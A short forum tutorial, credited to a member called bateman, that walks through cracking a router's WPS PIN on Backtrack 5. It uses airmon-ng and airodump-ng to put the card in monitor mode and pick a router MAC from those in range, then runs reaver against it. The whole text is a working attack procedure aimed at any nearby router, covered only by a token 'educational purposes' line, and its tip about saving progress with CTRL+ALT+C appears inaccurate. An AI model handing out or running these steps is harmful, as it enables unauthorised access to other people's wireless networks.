CRACKING WPS

This tutorial was created by one of our members, bateman. THIS WILL ONLY WORK IF WPS IS ENABLED ON THE ROUTER. (it is on most routers)

Boot up Backtrack 5, preferrably the latest version.

If you aren't using the latest backtrack, you'll need to download reaver. You can do this by connecting to the internet and typing the following in the command terminal: apt-get install reaver

Now you need to put your wireless card into monitor mode. On most PC's, your wireless card device name will be wlan0 so thats what we'll use for this tutorial. Type the following into the terminal: airmon-ng start wlan0

Next you need the mac address of the router. to get this type the following command: airodump-ng wlan0

You should now see a list of routers in range and their mac address, along with channel etc. Copy the MAC address

Next, you need to start up reaver. You can do this by simply typing reaver in the terminal and pressing enter. This will show you all the available commands you can use in reaver, so feel free to play with the options.

Enter the following command: reaver -i mon0 -b MACADDRESSHERE -vv

Now let the program do its stuff, it can take as long 40+ hours to crack a weak signal. But usually less than 24 hours. if you need to use your pc in the mean time. you can save the work done by reaver by pressing: CTRL+ALT+C

note: this does not seem to work on BT(British telecom) router's even if wps is enabled. This is for educational purposes only. UPDATE: the Reaver program is now included in Backtrack 5R2   

Like always, this is for educational purposes only.